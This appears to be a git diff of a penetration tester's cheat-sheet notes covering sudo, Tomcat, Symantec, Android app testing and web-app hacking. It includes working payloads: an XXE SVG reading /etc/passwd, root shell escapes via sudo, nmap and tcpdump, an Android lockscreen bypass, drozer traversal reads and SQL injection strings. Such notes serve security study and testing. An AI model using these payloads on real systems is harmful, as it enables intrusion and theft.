+http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204 [2]
+
+* good read
+http://sec.baidu.com/index.php?research/detail/id/18
+http://drops.wooyun.org/papers/1377
+
+# CVE-2016-3081
+https://struts.apache.org/docs/s2-032.html
+http://drops.wooyun.org/papers/15430
+
+# not about S2-020
+http://zone.wooyun.org/content/3880
+http://blog.wangzhan.360.cn/?p=222
+http://www.hljy.com.cn/elmah.axd/detail?id=a6bddf7c-868f-4c15-afaa-662621bf0ad4
+
+# CVE-2017-5638
+https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5638.nse
diff --git a/Cheat Sheet/sudo b/Cheat Sheet/sudo
new file mode 100644
index 0000000..bf0372d
--- /dev/null
+++ b/Cheat Sheet/sudo	
@@ -0,0 +1,63 @@
+# sudo
+
+Todd C. Miller is the main dev
+
+# sudoedit path not verified in sudo <= 1.7.2p5
+need local user with permission to run sudoedit
+
+# try run command that doesn't require password, if it fails it won't be logged
+sudo -n <command> 
+
+# tty_tickets (1.3.5-1.7.10 and 1.8.0-1.8.5) (CVE-2013-1776)
+https://gist.github.com/ryancdotorg/5136278 #exploit
+
+# env variables not sanitized (sudo <= 1.6.9p18)
+# env_reset must be disabled (!env_reset) or dangerous env vars must be whitelisted
+# PS4 trick. Added to blacklist in 1.6.8p10
+0511-exploits/sudo168p10.sh.txt (Nov 2005)
+# LD_PRELOAD trick
+0811-exploits/sudo-local.txt (Nov 2008)
+http://www.sensepost.com/blog/9108.html (2013)
+
+# can any of the allowed programs be overwritten/created?
+
+# sudo -k epoch bug (1.6.0-1.7.10p6 and 1.8.0-1.8.6p6)
+# msf module tested working on Mac OS 10.7-10.8.4 (patched in 10.9 beta)
+http://www.sudo.ws/sudo/alerts/epoch_ticket.html
+msf module: http://packetstormsecurity.com/files/122965 http://www.exploit-db.com/exploits/27944/
+chris l'a fait avec systemsetup mais utiliser dscl serait "plus simple"
+il faut etre un utilisateur interactif (uid < 500) pour avoir le droit d'executer systemsetup
+
+# CVE-2014-9680
+http://www.sudo.ws/alerts/tz.html
+
+# tricks & shell escapes
+$ TZ=/etc/shadow sudo -u root date
+
+$ nmap --interactive
+nmap> !id
+$ sudo nmap -iL /etc/shadow
+Failed to resolve “root:$6$tacL...
+
+$ sudo find /dev/null -exec id \; # shell escape
+uid=0(root) gid=0(root) groups=0(root)
+
+http://0x90909090.blogspot.com.au/2015/07/no-one-expect-command-execution.html # moar
+
+## sudo tests
+* how to test
+cat /opt/path/test.sh <<'EOF'
+#!/bin/bash
+echo "PS4: $PS4"
+EOF
+chmod +x /opt/patht/test.sh
+
+# visudo
+Defaults !env_reset
+john ALL=(root) /opt/path/test.sh
+
+$ sudo PS4=blah /opt/path/test.sh
+PS4: blah # sudo is vuln
+
+$ sudo PS4=blah /opt/path/test.sh
+PS4: + # sudo is NOT vuln
diff --git a/Cheat Sheet/svg b/Cheat Sheet/svg
new file mode 100644
index 0000000..c557d2e
--- /dev/null
+++ b/Cheat Sheet/svg	
@@ -0,0 +1,5 @@
+# svg
+
+# http://www.insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/ can place text into images with SVG
+# vuln on Apache Batik (1.0 – 1.7).
+<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="16" x="10" y="40">&xxe;</text></svg>
diff --git a/Cheat Sheet/sybase b/Cheat Sheet/sybase
new file mode 100644
index 0000000..374e0b9
--- /dev/null
+++ b/Cheat Sheet/sybase	
@@ -0,0 +1,3 @@
+# sybase
+
+default creds: DBA/SQL
diff --git a/Cheat Sheet/symantec b/Cheat Sheet/symantec
new file mode 100644
index 0000000..7dbe0c6
--- /dev/null
+++ b/Cheat Sheet/symantec	
@@ -0,0 +1,19 @@
+# symantec
+
+nmap -p38292,12174,2967,8443,9090
+
+# Symantec System Center Alert Management System 
+38292/tcp ./modules/exploits/windows/antivirus/ams_hndlrsvc.rb ./modules/exploits/windows/antivirus/symantec_iao.rb
+12174/tcp ./modules/exploits/windows/antivirus/ams_xfr.rb
+2967/tcp ./modules/exploits/windows/antivirus/symantec_rtvscan.rb (buffer overflow)
+
+# SEP Manager
+8443/tcp & 9090/tcp
+http://codewhitesec.blogspot.nl/2015/07/symantec-endpoint-protection.html
+https://github.com/brandonprry/metasploit-framework/blob/sepm_bypass_rce/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+
+# signatures
+http://www.symantec.com/security_response/attacksignatures/
+
+# Symantec Messaging Gateway Version 10.6.3-2
+http://seclists.org/fulldisclosure/2017/Aug/28
diff --git a/Cheat Sheet/symfony b/Cheat Sheet/symfony
new file mode 100644
index 0000000..f360a6a
--- /dev/null
+++ b/Cheat Sheet/symfony	
@@ -0,0 +1,6 @@
+# symfony
+
+if symfony exists
+go to app_dev.php/_profiler/
+if they misprovisioned you can do fun stuff
+http://account.leagueoflegends.com/app_dev.php/_profiler/phpinfo
diff --git a/Cheat Sheet/sysinternals b/Cheat Sheet/sysinternals
new file mode 100644
index 0000000..87a51f8
--- /dev/null
+++ b/Cheat Sheet/sysinternals	
@@ -0,0 +1,21 @@
+# sysinternals
+
+# description of every tools
+http://technet.microsoft.com/en-au/sysinternals/bb545027.aspx
+
+# secu
+PsLoggedOn
+RootkitRevealer
+
+# info systeme
+PendMoves
+
+# outils pour fichier et disque
+cacheset
+contig -s -v -a c:\
+diskview
+pagedefrag
+pendmoves
+
+# tous les outils sysinternals, valider automatiquement la popup
+procexp /accepteula
diff --git a/Cheat Sheet/tcl b/Cheat Sheet/tcl
new file mode 100644
index 0000000..bc95bb1
--- /dev/null
+++ b/Cheat Sheet/tcl	
@@ -0,0 +1,51 @@
+# tcl
+
+A command within square brackets ([]) is replaced with the return value from the execution of that command.
+Words within double quotes or braces are grouped into a single argument. However, double quotes and braces cause different behavior during the substitution phase.
+By contrast, grouping words within double braces *disables* substitution within the braces
+Characters within braces are passed to a command exactly as written. The only "Backslash Sequence" that is processed within braces is the backslash at the end of a line. This is still a line continuation character.
+Inside an already grouped string (" ou {}) a brace is treated as ASCII character
+If the string is grouped with quotes, substitutions will occur within the quoted string, even between the braces. 
+command in [] is actually part of the Tcl substitution phase.
+A square bracket within braces is not modified during the substitution phase.
+set returns the new value of the variable
+The test expression following if should return one of:
+                      False            True
+                      -------          ------ 
+ a numeric value      0                all others
+ yes/no               no               yes 
+ true/false           false            true
+
+True/FALSE or YeS/nO are legitimate return
+The test expression following if may be enclosed within quotes, or braces. If it is enclosed within braces, it will be evaluated within the if command, and if enclosed within quotes it will be evaluated during the substitution phase, and then another round of substitutions will be done within the if command.
+
+set y x;
+if "$$y != 1" {
+
+When proc is invoked, it creates a structure to define the procedure, and adds that structure and name to the tables used when parsing commands. If the command already existed, then it will be replaced by the new command with the same name.
+
+si ya pas de return, proc will return the value of the last command to be executed.
+
+"blah{$toto}"
+{blah{$toto}}
+
+## vuln
+tclsh8.5 [~]set cc {[puts pwn]}
+[puts pwn]
+tclsh8.5 [~]if $cc { puts "ok" }
+
+## pas vuln
+tclsh8.5 [~]if [catch {$cc} msg] { puts "ok" }
+ok
+
+## vuln
+tclsh8.5 [~]if [catch $cc msg] { puts "ok: $msg" } else { puts "else:$msg" }
+pwn
+ok: empty command name ""
+
+## pas vuln
+eval $lqry
+
+de manière générale, faire eval d'une liste ne presente pas de vuln
+
+
diff --git a/Cheat Sheet/tcpdump b/Cheat Sheet/tcpdump
new file mode 100644
index 0000000..593f0e0
--- /dev/null
+++ b/Cheat Sheet/tcpdump	
@@ -0,0 +1,6 @@
+# tcpdump
+
+# privesc
+$ echo /etc/shadow > /tmp/lol; chmod +x /tmp/lol
+$ sudo tcpdump -ln -i em1 -w /tmp/blah.cap -c 100 -G 1 -z /tmp/lol
+
diff --git a/Cheat Sheet/tcpip b/Cheat Sheet/tcpip
new file mode 100644
index 0000000..9bad52f
--- /dev/null
+++ b/Cheat Sheet/tcpip	
@@ -0,0 +1,9 @@
+# ip tcp
+
+https://code.google.com/p/packetdrill/
+
+# tcp syn cookies allows an attacker to spoof a tcp connection
+http://www.jakoblell.com/blog/2013/08/13/quick-blind-tcp-connection-spoofing-with-syn-cookies/
+
+# injecting raw sockets in python
+http://www.pythonforpentesting.com/2014/08/tcp-packet-injection-with-python.html
diff --git a/Cheat Sheet/tftp b/Cheat Sheet/tftp
new file mode 100644
index 0000000..779d179
--- /dev/null
+++ b/Cheat Sheet/tftp	
@@ -0,0 +1,5 @@
+# tftp
+
+# bruteforce
+hg clone https://code.google.com/p/tftptheft/
+
diff --git a/Cheat Sheet/tightvnc b/Cheat Sheet/tightvnc
new file mode 100644
index 0000000..86cea3a
--- /dev/null
+++ b/Cheat Sheet/tightvnc	
@@ -0,0 +1,10 @@
+# tightvnc
+
+- password key
+"HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server",  "Password"
+
+- password to lock the 'options'
+"HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server",  "ControlPassword"
+
+- to enable using passwords
+"HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server",  "UseControlAuthentication
diff --git a/Cheat Sheet/tls b/Cheat Sheet/tls
new file mode 100644
index 0000000..486f2f6
--- /dev/null
+++ b/Cheat Sheet/tls	
@@ -0,0 +1,8 @@
+# tls renegotiation
+
+# tester manuellement
+http://blog.ivanristic.com/2009/12/testing-for-ssl-renegotiation.html
+
+# PoC
+http://www.redteam-pentesting.de/en/publications/tls-renegotiation/-tls-renegotiation-vulnerability-proof-of-concept-code
+
diff --git a/Cheat Sheet/tmahh b/Cheat Sheet/tmahh
new file mode 100644
index 0000000..06c95cb
--- /dev/null
+++ b/Cheat Sheet/tmahh	
@@ -0,0 +1,322 @@
+# the mobile application hacker's handbook
+
+jdk1.6
+
+alternatives to android's official emulator, such as genymotion, run x86 versions of Android and some applications that contain native code may not support this architecture. However, for exploring Android to understand how it works, they are useful and some may run quicker than the Google emulators. However, it is still the author’s preference to use the official Android emulator as it is always guaranteed to be unmodified.
+
+* Dalvik VM hello world (need jdk1.6). Dalvik later replaced by ART (Android Runtime) in Android 4.4 to improve speed
+$ javac Test.java
+$ dx –dex –output=test.jar Test.class
+
+* app installation process
+The installation process via the GTalkService was explored in an excellent blog post by Jon Oberheide at https://jon.oberheide.org/blog/2010/06/28/a‐peek‐ inside‐the‐gtalkservice‐connection/. The 
+
+adb install actually calls /system/bin/pm
+
+* key tools
+pm disable <package_name> useful for disabling pesky applications that came with your device
+getprop This tool allows you to retrieve all system properties including verbose hardware and software information.
+dumpsys This tool displays information about the status of system services. If run without any arguments it iterates through all system services. You can also find these services by running service list.
+
+* drozer
+drozer agent build --permission android.permission.INSTALL_PACKAGES
+adb install /tmp/agent.apk
+adb forward tcp:31415 tcp:31415
+
+drozer console connect
+list package
+module search -d
+module install
+shell
+run app.package.info ‐h
+run app.package.info -a com.android.browser
+
+run app.package.list ‐p android.permission.READ_SMS
+run app.provider.info ‐p android.permission.READ_SMS
+
+run app.package.list ‐f "Terminal Emulator"
+
+* components
+kernel module /dev/binder (IPC)
+activity
+service (can be started or bound to)
+broadcast receiver (register for events)
+content provider (data storehouses, commonly sqlite)
+intent (implicit or explicit)
+run app.activity.start --action android.intent.action.VIEW --data‐uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
+run app.provider.query content://settings/system
+
+* misc
+FORWARD_LOCK /data/app-private but since 4.1, apps are stored with .asec in /data/app‐asec and encrypted with device-specific key (/data/misc/systemkeys/AppsOnSD.sks)
+/data/dalvik-cache replaced by ART since 5.0
+/dev/socket/zygote
+protection level: signature 0x2 Indicates that this permission can only be granted to another application that was signed with the same certificate as the application that defined the permission.
+sharedUserId
+android sandbox == linux user/group perms + IPC calls to binder
+FDE only encrypts /data. Look for app storing sensitive data on sdcard. Some manufacturers have customized Android to include the encryption of the SD card.
+ODEX file can be converted to .dex using baksmali+smali
+OAT file still contains the original classes.dex file (use oat2dex), useful if original .apk is no longer avail on device.
+content providers exported by default on API<17 == <android 4.2
+
+# tools
+Jadx (dex to java decompiler)
+JEB (trial)
+
+# methodo
+* signature
+Third‐party applications that do not have any intention of sharing data or
+functionality with applications from other developers should always define
+permissions with the signature protection level. This ensures that another
+developer cannot write an application that requests your permission and
+gains access to your exported components. T
+
+* permissions
+by default /data/data/com.blah is o+x so make sure com.blah/* are all o-r
+requesting some permissions may get your application put in a certain group. For instance, inet when requesting android.permission .INTERNET. This means that accessing the network from an application would be governed by the OS’s native security checks and not binder.
+
+* review manifest
+aapt dump xmltree /path/to/agent.apk AndroidManifest.xml or aapt l -a /path/to/agent.apk
+java -jar AXMLPrinter2.jar AndroidManifest.xml
+run app.package.manifest com.mwr.dz > /data/local/tmp/manif.xml
+sharedUserId of android.uid.system? (effectively sets UID to 1000, a privileged context on a device)
+
+* exported components
+Even if activity does not have android:exported attribute if an intent filter is present, the activity is still exported.
+Code running as root or system can interact with any component and send intents to them even when they are not exported in their manifest. 
+Protection level signature ensures that only another application that was signed by the same certificate can interact with component.
+See Protection Level Downgrade Attack (install malicious app that defines and uses the Twitter app's permissions with normal level, when installing the Twitter app the perms will be normal instead of signature)
+<activity-alias> can also allow access to activities that are not exported (explicitly or through the use of intent filters), app.activity.info will list any aliases.
+activities can send info back to caller when they finish(). Checking whether an activity sends a result back is as simple as checking for the existence of the keyword setResult in the activity’s code. If the calling application started the activity using startActivityForResult()rather than startActivity() then the intent received from the started activity can be caught inside the overridden onActivityResult() callback.
+
+run app.package.attacksurface com.blah.app
+
+run app.broadcast.info -a 
+run app.provider.info -a
+run app.activity.info -a 
+run app.service.info -a
+use -u to list components that are not exported
+run app.package.launchintent com.blah.app #finds main activity (android.intent.action.MAIN)
+
+dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList # invoke another exported activity
+adb# am start -n com.mwr.example.sieve/.SettingsActivity
+adb $ am start -n com.android.settings/com.android.settings.ChooseLockGeneric --ez confirm_credentials false --ei lockscreen.password_type 0 --activity-clear-task # CVE -2013-6271 lockscreen bypass <4.4
+
+* tapjacking
+grep -qr filterTouchesWhenObscured || echo vuln
+/!\ Some device vendors have mitigated tapjacking at an OS level. For instance, Samsung devices running Android versions Ice Cream Sandwich and later do not allow any touches to reach an underlying activity when there is a toast present on the screen, regardless of whether the filterTouchesWhenObscured attribute is set or not.
+
+* recent app screenshots
+
+* fragment injection
+All exported activities that extend PreferenceActivity and are running on Android 4.3 or prior are vulnerable. This attack was mitigated by Android in versions 4.4 onward by providing a new method in the PreferenceActivity class named isValidFragment() to allow developers to override it and validate which fragments can be loaded inside the activity
+
+change the PIN on a device running Android 4.3 or earlier
+run app.activity.start --component com.android.settings com.android.settings.Settings --extra string :android:show_fragment com.android.settings.ChooseLockPassword$ChooseLockPasswordFragment --extra boolean confirmcredentials false
+
+* trust boundaries
+
+* unprotected content providers
+app targets API<17 but exported="false" is not explicitly stated
+
+run app.provider.finduri # checks only for strings inside that DEX file that begin with content:// (should not be relied upon)
+run app.provider.query com.blah.app
+content query --uri content://com.mwr.example.sieve.DBContentProvider/Passwords (can be run only from an ADB shell and not inside an application because it is protected by the android.permission.ACCESS_CONTENT_PROVIDERS_EXTERNALLY permission, which has a protection level of signature defined by the android package)
+
+- SQL injection
+
+- file-backed content providers
+dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/system/etc/hosts
+127.0.0.1 localhost
+dz> run app.provider.read content://com.shazam.android.AdMarvelCachedImageLocalFileContentProvider/../../../../../../../../system/etc/hosts
+dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/../../../../data/data/com.mwr.example.sieve/databases/database.db 
+
+run scanner.provider.traversal -a content://com.mwr.example.sieve.FileBackupProvider
+
+- pattern-matching flaws
+
+* unprotected started services
+Started services are ones that implement the onStartCommand() method inside its class. The code may perform an unsafe task even just by being started or may use parameters that are sent and when certain conditions take place, perform an unexpected action. 
+review src code
+dz> run app.service.start
+
+ClipboardSaveService on Samsung
+adb shell am startservice -a com.android.clipboardsaveservice.CLIPBOARD_SAVE_SERVICE --es copyPath /sdcard/bla --es pastePath /sdcard/restore/
+dz> run app.service.start --action com.android.clipboardsaveservice.CLIPBOARD_SAVE_SERVICE --extra string copyPath /sdcard/bla --extra string pastePath /sdcard/restore/
+
+- unprotected bound services
+review handleMessage()
+see book
+
+* unprotected broadcast receivers
+check if any have been registered at runtime with registerReceiver() (dz module wont find them)
+
+CVE -2013-6272 initiate or terminate phone calls <=4.4.2
+dz> run app.broadcast.send --component com.android.phone com.android.phone.PhoneGlobals$NotificationBroadcastReceiver --action com.android.phone.ACTION_CALL_BACK_FROM_NOTIFICATION --data-uri tel:123456789
+
+- intent sniffing
+apps that broadcast intents containing sensitive and do not define required permissions that a broadcast receiver must hold or do not provide a destination package.
+search for sendBroadcast()
+dz> run app.broadcast.sniff --action android.intent.action.BATTERY_CHANGED
+
+- secret codes
+<html><iframe height ="1" src="/service/tel:*%23*%234636%23*%23*"></iframe></html>
+
+* file and folder perms
+umask of 0077 since 4.0
+droidwall race condition
+
+* file encryption
+SQLCipher => grep for openOrCreateDatabase()
+hooking encryption key with Cydia Substrate (http://blog.mdsec.co.uk/2014/02/hooking-sqlcipher-crypto-keys-with.html)
+
+* sd card
+app storing files on sd card is exposing them to any app with android.permission.READ_EXTERNAL_STORAGE permission on <4.4
+whatsapp + static AES key
+
+* logging
+app with READ_LOGS on <4.1
+app logging to file on sdcard
+
+* insecure comms
+cleartext
+
+* webviews
+chromium since 4.4, webkit before
+a WebView still runs within the context of the application that it is embedded in
+is it loading over cleartext or insecure ssl
+
+grep -E addJavascriptInterface|WebView
+
+module install javascript
+run scanner.misc.checkjavascriptbridge -a
+
+* clipboard
+stores last 20 items in /data/clipboard/ (need jdeserialize)
+module install clipboard
+run post.capture.clipboard
+run post.perform.setclipboard mahh123
+
+* local sockets
+adb shell netstat -antp
+tcpdump -s0 -w /data/local/tmp/dump.cap
+adb shell "tcpdump -s 0 -w - | nc -l -p 4444"
+adb forward tcp:4444 tcp:4444
+nc localhost 4444 | sudo wireshark -k -S -i -
+
+* native code
+
+- attaching a debugger
+adb shell setprop debug.db.uid 10053
+adb shell gdbserver :5039 --attach 5345
+adb forward tcp:5039 tcp:5039
+$ android-ndk-r9d/toolchains/arm-linux-androideabi-4.8/prebuilt/linux-x86_64/bin/arm-linux-androideabigdb
+(gdb) target remote :5039
+
+* misconfigured application attributes
+
+- android:allowBackup (4.0+)
+true by default
+run app.package.backup -f com.blah.app
+review code if app extends BackupAgent
+
+adb backup com.blah.app # contains files stode in private data directory and on sdcard
+dd if=backup.ab bs=24 skip=1 | openssl zlib -d > backup.tar
+
+- android:debuggable
+false by default
+run app.package.debuggable
+
+* misc
+cert ssl pinning, root detection: patching apk or at runtime w/ Cydia Substrate (technically superior to Xposed Framework)
+runtime monitoring -> introspy
+
+grep -Eir 'token|key|secret'
+adb shell screencap -p | sed 's/\r$//' > screen.png
+
+# chapter 8 - identifying and exploiting android implementations issues
+* finding powerful apps
+run app.package.list -p android.permission.INSTALL_PACKAGES
+run app.package.list -u 1000
+
+* finding default document readers
+run app.activity.forintent --action android.intent.action.VIEW --mimetype application/pdf
+
+* browsable activities
+run scanner.activity.browsable (find all BROWSABLE activities or pass -a com.blah.app)
+android.intent.category.BROWSABLE : allows an activity to be invoked from a browser
+example:
+<a href="/service/pwn://me">Start drozer - technique 1<a>
+<a href="/service/intent://me/#Intent;scheme=pwn;end">Start Drozer - technique 2</a>
+used at Movile Pwn2Own via intent bypass on chrome to exploit activities that perform tasks automatically in their onCreate() using the supplied bundle.
+
+* custom update mechanisms
+apps that hold the INSTALL_PACKAGES permission
+
+* remote loading of code (i.e. reflection)
+loading over http or from dexPath or dexOutputDir specified can be replaced by malicious code.
+
+* webviews
+defining a Java/JavaScript interface.
+can I inject JavaScript at any time?
+
+* listening services
+
+* messaging applications
+application that handles data from external sources = possible entry point of attack
+
+* finding local vulns
+
+* rogue agent
+drozer agent build --rogue --server 192.168.1.112:80
+
+* what can an attacker do once he gets a $ shell
+attacker cannot invoke any Java libs (i.e. if app has READ_SMS, attacker wont have access to associated content providers)
+explore SD card if app uid is part of a group
+pm install if app has INSTALL_PACKAGES
+
+* adb
+usb debugging needs to be enabled
+since 4.2.2 there's a authorization popup however mwr found a bypass on 4.2.2-4.4.2 (popup would show after navigating to emergency dialer)
+<4.2 /data/local.prop owned by system would have ro.secure=1 (0 for root), but since 4.2 file replaced by /default.prop owned by root.
+Since 4.3 no file anymore but compile-time flag ALLOW_ADBD_ROOT so exploit requires to overwrite adbd.
+
+* unlocked bootloaders
+
+* disabling lock screen
+android.permission.DISABLE_KEYGUARD
+or removing .key file (storing the lock pattern) will entirely disable lock screen
+
+Gaining root access and removing a key file is possible if the victim has
+unlocked her bootloader and forgotten to lock it again
+
+* cracking pattern or password from their .key file
+
+* simulating user interaction
+input
+
+* extracting app data with physical access
+adb backup -all -shared
+
+# Version / API / Codename
+5.0               21 LOLLIPOP
+4.4W              20 KITKAT_WATCH
+4.4               19 KITKAT
+4.3               18 JELLY_BEAN_MR2
+4.2, 4.2.2        17 JELLY_BEAN_MR1
+4.1, 4.1.1        16 JELLY_BEAN
+4.0.3, 4.0.4      15 ICE_CREAM_SANDWICH_MR1
+4.0, 4.0.1, 4.0.2 14 ICE_CREAM_SANDWICH
+
+3.2 13 HONEYCOMB_MR2
+3.1.x 12 HONEYCOMB_MR1
+3.0.x 11 HONEYCOMB
+2.3.3, 2.3.4 10 GINGERBREAD_MR1
+2.3, 2.3.1, 2.3.2 9 GINGERBREAD
+2.2.x 8 FROYO
+2.1.x 7 ECLAIR_MR1
+2.0.1 6 ECLAIR_0_1
+2.0 5 ECLAIR
+1.6 4 DONUT
+1.5 3 CUPCAKE
+1.1 2 BASE_1_1
+1.0 1 BASE
diff --git a/Cheat Sheet/tomcat b/Cheat Sheet/tomcat
new file mode 100644
index 0000000..cbbaf8d
--- /dev/null
+++ b/Cheat Sheet/tomcat	
@@ -0,0 +1,59 @@
+# tomcat 
+
+http://tomcat.apache.org/security.html
+
+== CVE-2009-0580 Enumerer les utilisateurs présents dans le tomcat-users.txt
+
+* tomcat-4.0.5
+wfuzz.py -z file -f /path/to/users.txt -d 'j_username=FUZZ' --hc 302 http://127.0.0.1:8080/examples/jsp/security/protected/j_security_check
+
+* tomcat-5.5.25
+utilise pas MemoryRealm par defaut dans conf/server.xml mais UserDatabaseRealm qui ne me semble pas vulnerable
+A confirmer pour les autres versions.
+
+* tomcat-6.0.18
+wfuzz.py -z file -f /tmp/users.txt -d 'j_username=FUZZ&j_password=%' --hw 133 --hl 25 'http://127.0.0.1:8080/examples/jsp/security/protected/j_security_check'
+Le username existe si Content-Length==0.
+
+
+== CVE-2002-1148 Recuperer le code source de pages JSP
+GET /WebApplication2/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp (cf. http://marc.info/?l=bugtraq&m=103288242014253&w=2 et pourtant j'arrive pas avec /admin/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp)
+testé avec succès sur 4.1.10 et 4.0.4
+
+== CVE-2002-1394 Recuperer le code source de pages JSP
+GET /WebApplication2/servlet/default/index.jsp  (cf. https://issues.apache.org/bugzilla/show_bug.cgi?id=13365)
+
+== CVE-2006-3835 Directory listing
+This is expected behaviour when directory listings are enabled. The semicolon (;) is the separator for path parameters so inserting one before a file name changes the request into a request for a directory with a path parameter. If directory listings are enabled, a directory listing will be shown. In response to this and other directory listing issues, directory listings were changed to be disabled by default.
+
+prereqs:
+  - dans conf/web.xml:
+<param-name>listings</param-name>
+<param-value>true</param-value>
+  - ya pas de fichier listé comme welcome-file dans /WebApplication2/
+exploit: GET /WebApplication2/;index.html ou ;help.do ou ;index.jsp
+
+
+## HTTPS
+# marche tres bien avec tomcat-4.1.31
+<Connector className="org.apache.coyote.tomcat4.CoyoteConnector"
+           port="8443" minProcessors="5" maxProcessors="75"
+           enableLookups="true"
+           acceptCount="10" debug="0" scheme="https" secure="true"
+           useURIValidationHack="false" disableUploadTimeout="true"
+           clientAuth="false">
+      <Factory className="org.apache.coyote.tomcat4.CoyoteServerSocketFactory"
+               clientAuth="false" protocol="TLS" keystoreFile="/path/to/sys/pki/tomcat.jks" keystorePass="password"/>
+
+</Connector>
+
+# manager-**
+creds are valid when the following URLs does not return 401
+manager-gui /manager/html 
+manager-status /manager/status
+manager-script /manager/text/list
+manager-jmx /manager/jmxproxy
+admin-gui /host-manager/html
+admin-script /host-manager/text/list
+
+
diff --git a/Cheat Sheet/tr b/Cheat Sheet/tr
new file mode 100644
index 0000000..4d53ce4
--- /dev/null
+++ b/Cheat Sheet/tr	
@@ -0,0 +1,11 @@
+# tr
+
+# ignorer tout caractere non ascii autre que LF et ' ' -> '~'
+tr -cd '\12\40-\176'
+
+# translate (rot2)
+tr a-z c-za-b
+
+# caesar rot13
+tr a-zA-Z n-za-mN-ZA-M
+tr a-zA-Z0-45-9 n-za-mN-ZA-M5-90-4
diff --git a/Cheat Sheet/traceroute b/Cheat Sheet/traceroute
new file mode 100644
index 0000000..869679c
--- /dev/null
+++ b/Cheat Sheet/traceroute	
@@ -0,0 +1,7 @@
+# traceroute
+
+# traceroute-nanog
+le man contient des exemples interessants
+- buggy hop that forwards packets with a zero TTL
+- hops that doesn't send "time exceeded"s
+- hops using the TTL from our arriving datagram as the TTL  in  its  icmp reply
diff --git a/Cheat Sheet/truecrypt b/Cheat Sheet/truecrypt
new file mode 100644
index 0000000..90a0fe0
--- /dev/null
+++ b/Cheat Sheet/truecrypt	
@@ -0,0 +1,4 @@
+# truecrypt
+
+cryptsetup open --type tcrypt path/to/vol.tc blah
+mount /dev/mapper/blah /mnt/tc
diff --git a/Cheat Sheet/tshark b/Cheat Sheet/tshark
new file mode 100644
index 0000000..f58926f
--- /dev/null
+++ b/Cheat Sheet/tshark	
@@ -0,0 +1,22 @@
+# tshark
+
+* fmt
+-o column.format:'"Source", "%s", "Destination","%d", "dstport", "%uD"'
+
+* SYN packets only
+tshark -lnn -i eth0  -Y 'tcp.flags.syn==1'
+tshark -lnn -i eth0  -Y 'tcp.flags.syn==1 && tcp.flags.ack==0' -f 'dst host 6.6.6.6'
+
+* http
+tshark -q -lnn -i eth0 -Y http.request -V -f 'dst host 6.6.6.6 and dst port 3000' | sed -e '/Frame [0-9]/,/Hypertext Transfer Protocol/d' -e '/^ \+\[/d' -e '/(Request Method|Request URI|Request Version)/d'
+tshark -q -lnn -i eth0 -Y http.request -V | sed -n -e '/Full request URI: /s,^.\+URI: \(.\+\)\],\1,p' -e '/Line-based text data/{n;p}'
+
+* ssl
+tshark -o "ssl.keys_list:192.168.105.160,443,http,privkey.pem" -Y frame.number==15 -x
+
+* mitm
+tshark -t u -i eth0 -lnn -F libpcap -w spoof.pcap -f "not tcp.analysis.duplicate_ack and not tcp.analysis.retransmission and not arp and host $VICTIM"
+gui: !tcp.analysis.retransmission && !tcp.analysis.duplicate_ack
+
+* extract data
+tshark -r blah.pcap -Y data -T fields -e data.data
diff --git a/Cheat Sheet/twahh b/Cheat Sheet/twahh
new file mode 100644
index 0000000..3659d57
--- /dev/null
+++ b/Cheat Sheet/twahh	
@@ -0,0 +1,177 @@
+# webapp hacker's handbook
+
+# SQL injection
+
+* fingerprint db
+MySQL: 'serv' 'ices'
+MS-SQL: 'serv'+'ices'
+Oracle: 'serv'||'ices'
+Postgres: 'serv'||'ices'
+
+Oracle: BITAND(1,1)-BITAND(1,1)
+MS-SQL: @@PACK_RECEIVED-@@PACK-RECEIVED
+MySQL: CONNECTION_ID()-CONNECTION_ID()
+MySQL: /*!32302 and 1=0*/ # will cause the select stmt to be false if the version in use is greater than or equal to 3.23.02
+
+* Oracle
+select object_name,object_type from user_objects
+select column_name from user_tab_columns where table_name='USERS'
+
+* MS-SQL
+' union select name,null from sysobjects where xtype = 'U'
+' union select b.name,null from sysobjects a,syscolumns b where a.id=b.id and a.name='users'--
+
+* determine number of columns and their data type in a select
+' order by 1--
+' order by 2--
+or
+' union select null,null-- # but note the additional row of data containing the word NULL or an empty string
+
+' union select 'a',null,null
+' union select null,'a',null
+
+* enumerating table and column names (MS-SQL)
+' having 1=1-- # error says column 'users.ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause
+' group by users.ID having 1=1-- # error says column 'users.username' ...
+' group by users.ID, users.username having 1=1-- # does not result in any error msg
+next step is to determine data types of each column
+' union select sum(username) from users-- # The sum cannot take a varchar data type as an argumenet
+' union select sum(ID) from users-- # must have an equal number of expressions... so ID in a numeric data type
+you then do
+'; insert into users values( 666, 'attacker')--
+
+
+' or 1 in (select @@version)--
+Other ways of causing the db to attempt to convert a string value to a numeric data type:
+1+@@version
+SELECT CAST(@@version AS int)
+
+' or 1 in (select min(username) from users where username > 'a')-- # returns "aaron"
+' or 1 in (select min(username) from users where username > 'aaron')--
+
+* filter doubles up single quotes
+the payload "admin'--" will not work
+SELECT * FROM users WHERE username = 'admin''--' and password = '' -> user == "admin'--" 
+but filter truncates input to 20 chars
+payload login: aaaaaaaaaaaaaaaaaaa' 
+payload passw: [space]or 1=1--
+SELECT * FROM users WHERE username = 'aaaaaaaaaaaaaaaaaaa'' and passsword = ' or 1=1--' -> user == "aaaaaaaaaaaaaaaaaaa' and password = "
+test with:
+''''''''''''''''''''''''''''''''''''''''''''' ... # even number
+a'''''''''''''''''''''''''''''''''''''''''''' ... # odd number
+
+* Second-Order
